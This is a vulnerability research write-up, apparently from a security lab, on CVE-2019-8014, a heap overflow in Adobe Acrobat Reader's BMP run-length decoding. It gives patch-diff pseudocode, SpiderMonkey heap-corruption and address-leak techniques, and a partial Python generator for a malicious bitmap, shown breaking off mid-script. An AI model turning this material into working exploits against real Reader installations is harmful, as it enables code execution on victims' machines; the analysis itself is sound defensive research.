Deep Analysis of CVE-2019-8014: The Vulnerability Ignored 6 Years Ago

This post provides a detailed analysis of CVE-2019-8014, which was recently fixed in Adobe Acrobat Reader / Pro DC. Interestingly, it is a patch bypass of CVE-2013-2729, which was fixed six years ago. The post also discusses how to exploit the vulnerability.

Author: Ke Liu of Tencent Security Xuanwu Lab

0x01. Introduction

Adobe released security updates for Adobe Acrobat and Reader in APSB19-41 in August. As usual, many vulnerabilities were fixed in the updates. While I was reviewing the corresponding advisories on ZDI, one of them caught my attention: ZDI-19-725 / CVE-2019-8014. The title and description of that advisory are as follows:

Adobe Acrobat Pro DC AcroForm Bitmap File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability

The specific flaw exists within the parsing of run length encoding in BMP images. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.

What surprised me most was that the flaw exists within the parsing of run length encoding in BMP images, because I remembered that a similar bug, CVE-2013-2729, was fixed in Adobe Reader six years ago. If you are also wondering how CVE-2013-2729 and CVE-2019-8014 are related, read on.

By the way, credit for CVE-2019-8014 goes to ktkitty (https://ktkitty.github.io).

0x02. Debugging Environment

Before diving into the details of the vulnerability, let’s set up the debugging environment. According to APSB19-41, Adobe Acrobat and Reader 2019.012.20035 and earlier on Windows were affected, and the fixed version was 2019.012.20036. We’ll carry out our analysis on these two versions.

Steps to install Adobe Acrobat Reader DC 2019.012.20035 :

Download and install 2019.012.20034 (Download Link)
Upgrade to 2019.012.20035 (Download Link)

Steps to install Adobe Acrobat Reader DC 2019.012.20036 :

Download and install 2019.012.20036 (Download Link)

Remember to disconnect from the Internet or disable the Adobe Acrobat Update Service; otherwise Adobe Acrobat Reader DC will update itself automatically.

0x03. Bitmap Structures

Before looking at the vulnerable code, let’s review some essential concepts of bitmap images. You can skip this section if you’re already familiar with them.

3.1 Structures

Generally speaking, a bitmap image is composed of four parts:

Bitmap File Header
Bitmap Info Header
RGBQUAD Array
Bitmap Data

3.1.1 Bitmap File Header

The BITMAPFILEHEADER structure contains information about the type, size, and layout of the bitmap file. The structure is defined as follows:

typedef struct tagBITMAPFILEHEADER {
  WORD  bfType;         // 'BM'
  DWORD bfSize;         // size of the bitmap file
  WORD  bfReserved1;    // 0
  WORD  bfReserved2;    // 0
  DWORD bfOffBits;      // offset of the bitmap bits
} BITMAPFILEHEADER, *LPBITMAPFILEHEADER, *PBITMAPFILEHEADER;

3.1.2 Bitmap Info Header

The BITMAPINFOHEADER structure contains information about the dimensions and color format of the bitmap file. The structure is defined as follows:

typedef struct tagBITMAPINFOHEADER {
  DWORD biSize;             // sizeof(BITMAPINFOHEADER)
  LONG  biWidth;            // bitmap width
  LONG  biHeight;           // bitmap height
  WORD  biPlanes;           // must be 1
  WORD  biBitCount;         // bits per pixel
  DWORD biCompression;      // compression method
  DWORD biSizeImage;        // size of bitmap bits
  LONG  biXPelsPerMeter;    // horizontal resolution, pixels-per-meter
  LONG  biYPelsPerMeter;    // vertical resolution, pixels-per-meter
  DWORD biClrUsed;          // number of color indexes in the color table
  DWORD biClrImportant;     // number of color indexes that are required
} BITMAPINFOHEADER, *PBITMAPINFOHEADER;

The value of biCompression specifies the compression method of the bitmap. Some of its possible values are:

#define BI_RGB  0  // uncompressed format
#define BI_RLE8 1  // run-length encoded (RLE) format with 8 bpp
#define BI_RLE4 2  // run-length encoded (RLE) format with 4 bpp
// other compression methods...

3.1.3 RGBQUAD Array

The RGBQUAD structure describes a color consisting of relative intensities of red, green, and blue. The structure is defined as follows:

typedef struct tagRGBQUAD {
  BYTE rgbBlue;
  BYTE rgbGreen;
  BYTE rgbRed;
  BYTE rgbReserved;
} RGBQUAD;

The elements of the RGBQUAD array make up the color table. The number of entries in the array depends on the values of the biBitCount and biClrUsed members of the BITMAPINFOHEADER structure.
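As a rough illustration of how these structures sit in a file, the sketch below unpacks the two headers with Python's struct module and derives the number of color table entries. The function names are invented for this example, and the rule that a zero biClrUsed means a full palette of 2^biBitCount entries (for bit depths of 8 or less) is the documented Windows convention, not something taken from AcroForm's parser.

```python
import struct

FILE_HEADER = struct.Struct('<2sIHHI')        # BITMAPFILEHEADER, 14 bytes
INFO_HEADER = struct.Struct('<IiiHHIIiiII')   # BITMAPINFOHEADER, 40 bytes

def color_table_entries(bit_count, clr_used):
    """Number of RGBQUAD entries that follow the info header."""
    if clr_used:
        return clr_used
    return (1 << bit_count) if bit_count <= 8 else 0

def parse_headers(blob):
    """Return (bfOffBits, biWidth, biHeight, biBitCount, biCompression, entries)."""
    magic, _size, _r1, _r2, off_bits = FILE_HEADER.unpack_from(blob, 0)
    if magic != b'BM':
        raise ValueError('not a bitmap file')
    (_hdr, width, height, _planes, bit_count, compression,
     _img, _xppm, _yppm, clr_used, _imp) = INFO_HEADER.unpack_from(blob, FILE_HEADER.size)
    return (off_bits, width, height, bit_count, compression,
            color_table_entries(bit_count, clr_used))

# Header-only sample: 0xF0 x 1 pixels, 8 bpp, BI_RLE8, default palette size.
sample = (FILE_HEADER.pack(b'BM', 0, 0, 0, 14 + 40 + 4 * 256) +
          INFO_HEADER.pack(40, 0xF0, 1, 1, 8, 1, 0, 0, 0, 0, 0))
print(parse_headers(sample))
```

The signed `i` format is used for the LONG members so that a negative biHeight (a top-down bitmap) would unpack correctly.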

3.1.4 Bitmap Data

This part holds the pixel data of the bitmap. Its layout depends on the compression method of the bitmap.

Note that pixels are usually stored “bottom-up”: starting in the lower left corner, going from left to right, and then row by row from the bottom to the top of the image [wikipedia].

3.2 Run Length Encoding

Two types of run length encoding can be used in bitmap files: RLE4 and RLE8.

3.2.1 RLE8

The RLE8 compression algorithm is used to compress an 8-bit bitmap. This format specifies encoded and absolute modes, and either mode can occur anywhere in a given bitmap.

Encoded mode involves two bytes:

If the first byte of a pair is greater than zero, it specifies the number of consecutive pixels to be drawn using the color index that is contained in the second byte.
If the first byte of a pair is zero and the second byte is 0x02 or less, the second byte is an escape value that can denote the end of a line, the end of the bitmap, or a relative pixel position, as follows.
- 0x00 - End of line
- 0x01 - End of bitmap
- 0x02 - Delta

When a delta is specified, the 2 bytes following the escape value contain unsigned values indicating the horizontal and vertical offsets of the next pixel relative to the current position.

In absolute mode, the first byte is zero, and the second byte is a value in the range 0x03 through 0xFF. The second byte represents the number of bytes that follow, each of which contains the color index of a single pixel. In absolute mode, each run is aligned on a word boundary.

The following example shows the hexadecimal contents of an 8-bit compressed bitmap:

[03 04] [05 06] [00 03 45 56 67 00] [02 78] [00 02 05 01] [02 78] [00 00] [09 1E] [00 01]

The bitmap expands as follows (two-digit values represent a color index for a single pixel):

04 04 04
06 06 06 06 06
45 56 67
78 78
move current position 5 right and 1 up
78 78
end of line
1E 1E 1E 1E 1E 1E 1E 1E 1E
end of RLE bitmap
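The rules above can be sketched as a small Python decoder that turns an RLE8 stream into a list of events. This is only an illustration of the format, not AcroForm's implementation; the function name and the event tuples are invented for the example. The sample stream includes the 00 padding byte after the three-byte absolute run, which the word-alignment rule requires.

```python
def decode_rle8(data):
    """Expand an RLE8 stream into a list of drawing events (illustrative only)."""
    events = []
    i = 0
    while i + 1 < len(data):
        first, second = data[i], data[i + 1]
        i += 2
        if first > 0:                      # encoded mode: run of one color index
            events.append(('run', [second] * first))
        elif second == 0:                  # escape: end of line
            events.append(('end_of_line',))
        elif second == 1:                  # escape: end of bitmap
            events.append(('end_of_bitmap',))
            break
        elif second == 2:                  # escape: delta, two offset bytes follow
            events.append(('delta', data[i], data[i + 1]))
            i += 2
        else:                              # absolute mode: `second` literal pixels
            events.append(('literal', list(data[i:i + second])))
            i += second + (second & 1)     # skip the pad byte of odd-length runs
    return events

example = bytes.fromhex(
    '03 04 05 06 00 03 45 56 67 00 02 78 00 02 05 01 02 78 00 00 09 1E 00 01')
for event in decode_rle8(example):
    print(event)
```

The decoder performs no bounds checking on positions at all; it only shows how the command stream is tokenized.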

3.2.2 RLE4

The RLE4 compression algorithm is used to compress a 4-bit bitmap. This format specifies encoded and absolute modes, and either mode can occur anywhere in a given bitmap.

Encoded mode involves two bytes. If the first byte of a pair is greater than zero, it specifies the number of consecutive pixels to be drawn using the two color indexes that are contained in the high-order and low-order bits of the second byte.

The first pixel is drawn using the color specified by the high-order 4 bits, the second is drawn using the color in the low-order 4 bits, the third is drawn using the color in the high-order 4 bits, and so on, until all the pixels specified by the first byte have been drawn.

If the first byte of a pair is zero and the second byte is 0x02 or less, the second byte is an escape value that can denote the end of a line, the end of the bitmap, or a relative pixel position, as follows.

0x00 - End of line
0x01 - End of bitmap
0x02 - Delta

When a delta is specified, the 2 bytes following the escape value contain unsigned values indicating the horizontal and vertical offsets of the next pixel relative to the current position.

In absolute mode, the first byte is zero, and the second byte is a value in the range 0x03 through 0xFF. The second byte contains the number of 4-bit color indexes that follow. Subsequent bytes contain color indexes in their high- and low-order 4 bits, one color index for each pixel. In absolute mode, each run is aligned on a word boundary.

The following example shows the hexadecimal contents of a 4-bit compressed bitmap:

[03 04] [05 06] [00 06 45 56 67 00] [04 78] [00 02 05 01] [04 78] [00 00] [09 1E] [00 01]

The bitmap expands as follows:

0 4 0
0 6 0 6 0
4 5 5 6 6 7
7 8 7 8
move current position 5 right and 1 up
7 8 7 8
end of line
1 E 1 E 1 E 1 E 1
end of RLE bitmap
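The only real difference from RLE8 is the nibble handling, which the following Python sketch isolates. The two helper names are invented for this illustration; they reproduce the expansion of the encoded and absolute runs from the example above.

```python
def expand_encoded_run(count, color_byte):
    """Alternate the high and low nibble of color_byte for `count` pixels."""
    high, low = color_byte >> 4, color_byte & 0xF
    return [high if i % 2 == 0 else low for i in range(count)]

def expand_absolute_run(count, payload):
    """Take `count` 4-bit color indexes from payload, high nibble first."""
    pixels = []
    for byte in payload:
        pixels.extend((byte >> 4, byte & 0xF))
    return pixels[:count]

print(expand_encoded_run(3, 0x04))                       # pair [03 04]
print(expand_encoded_run(9, 0x1E))                       # pair [09 1E]
print(expand_absolute_run(6, bytes.fromhex('455667')))   # run [00 06 45 56 67 00]
```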

0x04. Vulnerability Details

4.1 Code Identification

According to the advisory on ZDI’s website, the flaw exists within the AcroForm module. AcroForm is the forms plug-in of Adobe Acrobat Reader DC and is responsible for parsing XFA forms. The plug-in binary is located at:

%PROGRAMFILES(X86)%\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm.api

Generally speaking, patch analysis starts with BinDiff, which helps identify the functions that changed between the old and new versions of a binary. However, the target function is hard to find when too many functions have changed, and that is the case for AcroForm.api. Here we’ll use a few simple tricks to locate the relevant functions.

The following analysis was carried out on Adobe Acrobat Reader DC 2019.012.20035. The same method can be applied to version 2019.012.20036.

Search for the string PNG in IDA; one occurrence is at .rdata:20F9A374
Follow the cross references to 20F9A374 to reach function sub_20CF3A3F
Function sub_20CF3A3F is evidently responsible for identifying the type of the image
Follow the cross references to sub_20CF3A3F to reach function sub_20CF4BE8
Function sub_20CF4BE8 calls the matching image parsing function for each image type
Function sub_20CF3E5F, which is called by function sub_20CF4870, is responsible for parsing bitmap images

The BinDiff result shows that some basic blocks were changed in function sub_20CF3E5F. Let’s take the basic block that begins at 20CF440F as an example of the difference.

// 20CF440F in AcroForm 2019.012.20035
if ( v131 >= v26 || (unsigned __int8)v127 + v43 > v123 )
  goto LABEL_170;

// 20CF501F in AcroForm 2019.012.20036
v56 = (unsigned __int8)v130 + v43;
if ( v134 >= v26 || v56 > v126 || v56 < v43 || v56 < (unsigned __int8)v130 )
  goto LABEL_176;

The code was clearly changed to guard against integer overflow: the patched version also rejects a sum that is smaller than either of its operands.
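To make the difference concrete, the two checks can be modelled in Python, which has unbounded integers, by masking the sum to 32 bits. The function and parameter names are invented for this sketch, and the sample values are chosen purely for illustration.

```python
MASK32 = 0xFFFFFFFF  # the decompiled variables are 32-bit unsigned integers

def unpatched_rejects(count, xpos, ypos, width, height):
    """Check at 20CF440F (2019.012.20035): the sum may silently wrap around."""
    return ypos >= height or ((count + xpos) & MASK32) > width

def patched_rejects(count, xpos, ypos, width, height):
    """Check at 20CF501F (2019.012.20036): also detects the wrap-around."""
    dst = (count + xpos) & MASK32
    return ypos >= height or dst > width or dst < xpos or dst < count

# Illustrative values: a 0xF0-pixel-wide, one-row image and a huge xpos.
args = dict(count=0xF4, xpos=0xFFFFFF0C, ypos=0, width=0xF0, height=1)
print(unpatched_rejects(**args), patched_rejects(**args))

# A benign run is accepted by both versions.
benign = dict(count=3, xpos=0, ypos=0, width=0xF0, height=1)
print(unpatched_rejects(**benign), patched_rejects(**benign))
```

With the wrapping input the old check sees a sum of 0 and lets the run through, while the new check notices that the sum is smaller than xpos.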

4.2 Vulnerability Analysis

Thanks to feliam’s write-up on CVE-2013-2729, we can quickly understand what’s going on in function sub_20CF3E5F.

4.2.1 RLE8 Decoding

The following pseudo code, extracted from function sub_20CF3E5F, is responsible for parsing RLE8 compressed data.

if ( bmih.biCompression == 1 )  // RLE8 algorithm
{
  xpos = 0;                     // unsigned int, from left to right
  ypos = bmih.biHeight - 1;     // unsigned int, from bottom to top
  bitmap_ends = 0;
  result = fn_feof(v1[2]);
  if ( !result )
  {
    do
    {
      if ( bitmap_ends )
        return result;
      fn_read_bytes(v1[2], &cmd, 2u);           // read 2 bytes
      if ( (_BYTE)cmd )                         // first byte != 0
      {                                         // means have compressed data
        // 20CF440F, this basic block was patched in the updated binary file
        if ( ypos >= height || (unsigned __int8)cmd + xpos > width )
          goto LABEL_170;                       // CxxThrowException
        index = 0;
        if ( (_BYTE)cmd )
        {
          do
          {
            line = (_BYTE *)fn_get_scanline(v1[3], ypos);
            line[xpos++] = BYTE1(cmd);
            ++index;
          }
          while ( index < (unsigned __int8)cmd ); // uncompress data
        }
      }
      else if ( BYTE1(cmd) )        // first byte = 0, second byte != 0
      {
        if ( BYTE1(cmd) == 1 )      // end of bitmap
        {
          bitmap_ends = 1;
        }
        else if ( BYTE1(cmd) == 2 ) // delta
        {
          fn_read_bytes(v1[2], &xdelta, 1u);
          fn_read_bytes(v1[2], &ydelta, 1u);
          xpos += xdelta;           // move right
          ypos -= ydelta;           // move up
        }
        else                        // uncompressed data
        {
          dst_xpos = BYTE1(cmd) + xpos;
          if ( ypos >= height || dst_xpos < xpos || 
               dst_xpos < BYTE1(cmd) || dst_xpos > width )  // overflow check
            goto LABEL_170;         // CxxThrowException
          index = 0;
          if ( BYTE1(cmd) )
          {
            do
            {
              fn_read_bytes(v1[2], &value, 1u);
              line = (_BYTE *)fn_get_scanline(v1[3], ypos);
              line[xpos++] = value;
              count = BYTE1(cmd);
              ++index;
            }
            while ( index < BYTE1(cmd) );   // uncompressed data
          }
          if ( count & 1 )                  // alignment
            fn_read_bytes(v1[2], &value, 1u);
        }
      }
      else                                  // end of line
      {
        --ypos;                             // move to next line
        xpos = 0;
      }
      result = fn_feof(v1[2]);
    }
    while ( !result );
  }
}

Based on the patch analysis above, an integer overflow can be triggered in the following if statement.

// 20CF440F, this basic block was patched in the updated binary file
if ( ypos >= height || (unsigned __int8)cmd + xpos > width )
  goto LABEL_170;                       // CxxThrowException

// 20CF501F in AcroForm 2019.012.20036
dst_xpos = (unsigned __int8)cmd + xpos;
if ( ypos >= height || dst_xpos > width || 
     dst_xpos < xpos || dst_xpos < (unsigned __int8)cmd )
  goto LABEL_176;

The flaw lies in the computation of (unsigned __int8)cmd + xpos. Both operands can be controlled by the attacker, so the 32-bit sum can wrap around and pass the bounds check. An out-of-bounds write can then be triggered when decompressing RLE8 data.

The value of (unsigned __int8)cmd can be controlled directly in the bitmap file

fn_read_bytes(v1[2], &cmd, 2u); // read 2 bytes

The value of xpos can be controlled by arranging lots of delta commands in encoded mode

else if ( BYTE1(cmd) == 2 ) // delta
{
  fn_read_bytes(v1[2], &xdelta, 1u);
  fn_read_bytes(v1[2], &ydelta, 1u);
  xpos += xdelta;           // move right, add any value in [0, 255]
  ypos -= ydelta;           // move up
}

Out-Of-Bounds write can be triggered when decompressing RLE8 compressed data

index = 0;
do
{
  line = (_BYTE *)fn_get_scanline(v1[3], ypos);
  line[xpos++] = BYTE1(cmd);            // OOB write with controlled data
  ++index;
}
while ( index < (unsigned __int8)cmd ); // uncompress data

4.2.2 RLE4 Decoding

The following pseudo code, also extracted from function sub_20CF3E5F, is responsible for parsing RLE4 compressed data. The decoding process is almost the same as for RLE8, but slightly more complicated because the data unit is 4 bits rather than a byte.

if ( bmih.biCompression == 2 )  // RLE4 algorithm
{
  xpos = 0;                     // unsigned int, from left to right
  ypos = bmih.biHeight - 1;     // unsigned int, from bottom to top
  bitmap_ends = 0;
  odd_index_ = 0;
  if ( !fn_feof(v1[2]) )
  {
    do
    {
      if ( bitmap_ends )
        return result;
      fn_read_bytes(v1[2], &cmd, 2u);       // read 2 bytes
      if ( (_BYTE)cmd )                     // first byte != 0
      {                                     // means have compressed data
        high_4bits = BYTE1(cmd) >> 4;       // high-order 4 bits
        low_4bits = BYTE1(cmd) & 0xF;       // low-order 4 bits
        // 20CF45F8, this basic block was patched in the updated binary file
        if ( ypos >= height || (unsigned __int8)cmd + xpos > width )
          goto LABEL_170;                   // CxxThrowException
        index = 0;
        if ( (_BYTE)cmd )
        {
          xpos_ = odd_index_;
          do
          {
            byte_slot = xpos_ >> 1;
            odd_index = index & 1;
            line = fn_get_scanline(v1[3], ypos);
            _4bits = high_4bits;            // even index -> high-order 4 bits
            if ( odd_index )                // odd index -> low-order 4 bits
              _4bits = low_4bits;
            if ( xpos_ & 1 )                // odd xpos, old byte
            {
              line[byte_slot] |= _4bits;
            }
            else                            // even xpos, new byte
            {
              line[byte_slot] = 16 * _4bits;
            }
            ++xpos_;
            index = index + 1;
          }
          while ( index < (unsigned __int8)cmd );
          odd_index_ = xpos_;
          xpos = odd_index_;
        }
      }
      else if ( BYTE1(cmd) )                // first byte = 0, second byte != 0
      {
        if ( BYTE1(cmd) == 1 )              // end of bitmap
        {
          bitmap_ends = 1;
        }
        else if ( BYTE1(cmd) == 2 )         // delta
        {
          fn_read_bytes((_DWORD *)v1[2], &xdelta, 1u);
          fn_read_bytes((_DWORD *)v1[2], &ydelta, 1u);
          xpos += xdelta;                   // move right
          ypos -= ydelta;                   // move up
          odd_index_ = xpos;
        }
        else
        {
          // 20CF44EA, this basic block was patched in the updated binary file
          if ( ypos >= height || BYTE1(cmd) + xpos > width )
            goto LABEL_170;                 // CxxThrowException
          index = 0;
          odd_index = 0;
          if ( BYTE1(cmd) )                 // uncompressed data
          {
            xpos_ = odd_index_;
            do
            {
              odd_index_ = index & 1;
              if ( !(index & 1) )           // read 1 byte data
              {
                fn_read_bytes((_DWORD *)v1[2], &value, 1u);
                low_4bits_ = value & 0xF;   // low-order 4 bits
                high_4bits_ = value >> 4;   // high-order 4 bits
              }
              byte_slot = xpos_ >> 1;
              line = fn_get_scanline(v1[3], ypos);
              _4bits = high_4bits_;
              if ( odd_index_ )
                _4bits = low_4bits_;
              if ( xpos_ & 1 )
              {
                line[byte_slot] |= _4bits;
              }
              else
              {
                line[byte_slot] = 16 * _4bits;
              }
              ++xpos_;
              count = BYTE1(cmd);
              not_ended = odd_index++ + 1 < BYTE1(cmd);
              index = odd_index;
            }
            while ( not_ended );
            odd_index_ = xpos_;
            xpos = odd_index_;
          }
          if ( (count & 3u) - 1 <= 1 )      // alignment
            fn_read_bytes(v1[2], &value, 1u);
        }
      }
      else                                  // end of line
      {
        --ypos;                             // move to next line
        xpos = 0;
        odd_index_ = 0;
      }
      result = fn_feof((_DWORD *)v1[2]);
    }
    while ( !result );
  }
}

Integer overflows can be triggered in two spots. The first is in the handling of compressed data:

high_4bits = BYTE1(cmd) >> 4;       // high-order 4 bits
low_4bits = BYTE1(cmd) & 0xF;       // low-order 4 bits
// 20CF45F8, this basic block was patched in the updated binary file
if ( ypos >= height || (unsigned __int8)cmd + xpos > width )
  goto LABEL_170;                   // CxxThrowException

The second is in the handling of uncompressed data:

// 20CF44EA, this basic block was patched in the updated binary file
if ( ypos >= height || BYTE1(cmd) + xpos > width )
  goto LABEL_170;                 // CxxThrowException

0x05. Exploit

5.1 Overflow Candidate

Three integer overflows were found in the function. We’ll choose the one in the handling of RLE8 encoded data, because it is more exploit-friendly than the others.

When decoding RLE4 data, xpos is divided by 2 when data is written into the scan line, so the maximum offset into the scan line is 0xFFFFFFFF / 2 = 0x7FFFFFFF. This means that we can only write forward, and the address being written is probably out of our control.

When decoding RLE8 data, the offset into the scan line is xpos itself, so we can write backward and control the distance. In the following if statement, the maximum value of (unsigned __int8)cmd is 0xFF, so the smallest xpos that makes the sum wrap around and bypass the check is 0xFFFFFF01, which is -255 as a signed int. In other words, we can write at most 0xFF bytes backward.

// 20CF440F, this basic block was patched in the updated binary file
if ( ypos >= height || (unsigned __int8)cmd + xpos > width )
  goto LABEL_170;                       // CxxThrowException
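The limits quoted in this section follow from plain 32-bit arithmetic, which the Python sketch below reproduces. The helper names are invented for the example; it models only the arithmetic, not the decoder itself.

```python
MASK32 = 0xFFFFFFFF

def as_signed32(value):
    """Reinterpret a 32-bit unsigned value as a signed int."""
    value &= MASK32
    return value - (1 << 32) if value & 0x80000000 else value

def min_wrapping_xpos(count):
    """Smallest 32-bit xpos for which count + xpos wraps around (to 0)."""
    return (-count) & MASK32

xpos = min_wrapping_xpos(0xFF)
print(hex(xpos), as_signed32(xpos))   # RLE8: lowest usable xpos for a 0xFF run
print(hex(MASK32 >> 1))               # RLE4: largest byte slot, xpos >> 1
```

Any xpos below that minimum yields a sum that does not wrap and is far larger than width, so the run is rejected by the bounds check.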

However, the range we write can only be filled with a single repeated value. This causes some problems when writing the exploit, which will be explained later.

index = 0;
do
{
  line = (_BYTE *)fn_get_scanline(v1[3], ypos);
  line[xpos++] = BYTE1(cmd);
  ++index;
}
while ( index < (unsigned __int8)cmd );

5.2 SpiderMonkey Concepts

Adobe Reader uses SpiderMonkey as its JavaScript engine. Before writing the exploit, let’s review some essentials of the SpiderMonkey engine.

5.2.1 ArrayBuffer

When the value of byteLength is greater than 0x68, the backing store of the ArrayBuffer object is allocated from the system heap (through ucrtbase!calloc); otherwise it is allocated from SpiderMonkey’s tenured heap. Also, when it is allocated from the system heap, the underlying heap buffer is 0x10 bytes larger in order to hold the ObjectElements object.

class ObjectElements {
 public:
  uint32_t flags;               // can be any value, default is 0
  uint32_t initializedLength;   // byteLength
  uint32_t capacity;            // pointer of associated view object
  uint32_t length;              // can be any value, default is 0
 // ......
};

The member names of ObjectElements are meaningless for ArrayBuffer. Here the second member holds the byteLength value and the third member holds a pointer to the associated DataView object. The other members are unused and can hold any value.

var ab = new ArrayBuffer(0x70);
var dv = new DataView(ab);
dv.setUint32(0, 0x41424344, true);

When the above JavaScript code is executed in Adobe Reader, the backing store of the ArrayBuffer object looks like this:

;            -, byteLength, viewobj,       -,
34d54f80  00000000 00000070 2458f608 00000000
;         data
34d54f90  41424344 00000000 00000000 00000000
34d54fa0  00000000 00000000 00000000 00000000
34d54fb0  00000000 00000000 00000000 00000000
34d54fc0  00000000 00000000 00000000 00000000
34d54fd0  00000000 00000000 00000000 00000000
34d54fe0  00000000 00000000 00000000 00000000
34d54ff0  00000000 00000000 00000000 00000000

If we can change the byteLength value of an ArrayBuffer, we can achieve out-of-bounds access. But be careful with the pointer to the associated DataView object: it must be either 0 or a valid DataView pointer, and the process may crash immediately if it is changed to any other value.
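The layout described above can be summarized in a few lines of Python. This is a sketch based only on the numbers quoted in this section (the 0x68 threshold and the 0x10-byte header); the function names are invented, and the header bytes are rebuilt from the first line of the dump.

```python
import struct

HEADER_SIZE = 0x10      # ObjectElements: four uint32_t members
HEAP_THRESHOLD = 0x68   # byteLength above this goes to the system heap

def system_heap_alloc_size(byte_length):
    """Size of the heap block backing an ArrayBuffer, or None for the tenured heap."""
    if byte_length <= HEAP_THRESHOLD:
        return None
    return byte_length + HEADER_SIZE

def parse_header(raw):
    """Split the 16-byte header into (flags, byteLength, view pointer, length)."""
    return struct.unpack('<4I', raw[:HEADER_SIZE])

# First line of the dump: 00000000 00000070 2458f608 00000000
raw = struct.pack('<4I', 0x00000000, 0x00000070, 0x2458F608, 0x00000000)
print([hex(v) for v in parse_header(raw)])
print(hex(system_heap_alloc_size(0x70)))
```

The 0x80-byte result matches the dump, which spans 34d54f80 through 34d54fff. By the same arithmetic, a byteLength of 0xE0 gives a 0xF0-byte heap block.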

5.2.2 Array

When the value of length is greater than 14, the Array object can be allocated from the system heap (through ucrtbase!calloc); otherwise it may be allocated from SpiderMonkey’s nursery heap. Also, when it is allocated from the system heap, the underlying heap buffer is 0x10 bytes larger in order to hold the ObjectElements object.

class ObjectElements {
 public:
  // The NumShiftedElementsBits high bits of this are used to store the
  // number of shifted elements, the other bits are available for the flags.
  // See Flags enum above.
  uint32_t flags;

  /*
   * Number of initialized elements. This is <= the capacity, and for arrays
   * is <= the length. Memory for elements above the initialized length is
   * uninitialized, but values between the initialized length and the proper
   * length are conceptually holes.
   */
  uint32_t initializedLength;

  /* Number of allocated slots. */
  uint32_t capacity;

  /* 'length' property of array objects, unused for other objects. */
  uint32_t length;
 // ......
};


var array = new Array(15);
array[0] = array[array.length - 1] = 0x41424344;

When the above JavaScript code is executed in Adobe Reader, the underlying storage buffer of the Array object looks like this:

0:010> dd 34cb0f88-10 L90/4
34cb0f78  00000000 0000000f 0000000f 0000000f
34cb0f88  41424344 ffffff81 00000000 ffffff84 ; [0], [1]
34cb0f98  00000000 ffffff84 00000000 ffffff84
34cb0fa8  00000000 ffffff84 00000000 ffffff84
34cb0fb8  00000000 ffffff84 00000000 ffffff84
34cb0fc8  00000000 ffffff84 00000000 ffffff84
34cb0fd8  00000000 ffffff84 00000000 ffffff84
34cb0fe8  00000000 ffffff84 00000000 ffffff84
34cb0ff8  41424344 ffffff81 ???????? ???????? ; [14]

Both array[0] and array[14] contain 41424344 ffffff81, where the upper four bytes 0xFFFFFF81 indicate that the element type is INT32. The elements in [1, 13] all contain 00000000 ffffff84, which means that they are undefined.

If we change only the values of capacity and length, all we gain is an out-of-bounds write, and the space between the originally initialized elements and the element written out of bounds is filled with 00000000 ffffff84. That is of little use.

Changing initializedLength to a large value is not a good idea either. The GC scans the array elements, so it will probably hit an inaccessible memory page and crash the process.
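The element encoding seen in the dump can be decoded with a short Python sketch. Only the two tag values that appear in the dump are handled; everything else is reported as "other". The names are invented for this illustration.

```python
import struct

TAG_INT32 = 0xFFFFFF81       # tag values as observed in the dump
TAG_UNDEFINED = 0xFFFFFF84

def decode_element(raw8):
    """Decode one 8-byte array element into a (type name, payload) tuple."""
    payload, tag = struct.unpack('<II', raw8)   # low dword first, tag second
    if tag == TAG_INT32:
        return ('int32', payload)
    if tag == TAG_UNDEFINED:
        return ('undefined', None)
    return ('other', payload)

first = struct.pack('<II', 0x41424344, 0xFFFFFF81)   # array[0]
hole = struct.pack('<II', 0x00000000, 0xFFFFFF84)    # array[1]
print(decode_element(first), decode_element(hole))
```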

5.2.3 JSObject

In SpiderMonkey, almost all JavaScript objects inherit from JSObject, and the latter inherits from ObjectImpl.

class ObjectImpl : public gc::Cell {
  protected:
    HeapPtrShape shape_;
    HeapPtrTypeObject type_;
    HeapSlot *slots;
    HeapSlot *elements;
  // ......
};
    
struct JSObject : public js::ObjectImpl {}

For a DataView object, the elements member points to the shared emptyElementsHeader (more precisely, just past it, as the definition below shows), which can be used to leak the base address of the JavaScript engine module.

static ObjectElements emptyElementsHeader(0, 0);

/* Objects with no elements share one empty set of elements. */
HeapSlot *js::emptyObjectElements =
    reinterpret_cast<HeapSlot *>(uintptr_t(&emptyElementsHeader) + 
    sizeof(ObjectElements));
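Given a leaked elements pointer, recovering the module base is a matter of two subtractions, sketched below in Python. The offset of emptyElementsHeader inside the module is version specific and is not given in this post, so the value used here is a made-up placeholder, as is the sample base address.

```python
SIZEOF_OBJECT_ELEMENTS = 0x10   # four uint32_t members, as listed earlier

def engine_base_from_elements(elements_ptr, empty_header_rva):
    """Recover the module base from a leaked `elements` pointer.

    empty_header_rva is the offset of emptyElementsHeader inside the module.
    It must be looked up for the exact build being targeted.
    """
    header_addr = elements_ptr - SIZEOF_OBJECT_ELEMENTS
    return header_addr - empty_header_rva

# Placeholder numbers only, not taken from a real build.
PLACEHOLDER_RVA = 0x123450
leaked = 0x60000000 + PLACEHOLDER_RVA + SIZEOF_OBJECT_ELEMENTS
print(hex(engine_base_from_elements(leaked, PLACEHOLDER_RVA)))
```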

5.3 Bitmap Construct

The following Python code can be used to generate an RLE compressed bitmap image.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import struct

RLE8 = 1
RLE4 = 2
COMPRESSION = RLE8
BIT_COUNT = 8
CLR_USED = 1 << BIT_COUNT
WIDTH = 0xF0
HEIGHT = 1

def get_bitmap_file_header(file_size, bits_offset):
    # bfType, bfSize, bfReserved1, bfReserved2, bfOffBits
    return struct.pack('<2sIHHI', b'BM', file_size, 0, 0, bits_offset)

def get_bitmap_info_header(data_size):
    return struct.pack('<IIIHHIIIIII',
        0x00000028,     # biSize
        WIDTH,          # biWidth
        HEIGHT,         # biHeight
        0x0001,         # biPlanes
        BIT_COUNT,      # biBitCount
        COMPRESSION,    # biCompression
        data_size,      # biSizeImage
        0x00000000,     # biXPelsPerMeter
        0x00000000,     # biYPelsPerMeter
        CLR_USED,       # biClrUsed
        0x00000000)     # biClrImportant

def get_bitmap_info_colors():
    # B, G, R, Reserved
    rgb_quad = b'\x00\x00\xFF\x00'
    return rgb_quad * CLR_USED

def get_bitmap_data():
    # set ypos to 0 so that we'll be at the beginning of the heap buffer
    # ypos = (HEIGHT - 1) = 0, no need to bother

    # set xpos to 0xFFFFFF00 with delta commands that each add 0xFF
    data = b'\x00\x02\xFF\x00' * (0xFFFFFF00 // 0xFF)
    # set xpos to 0xFFFFFF0C
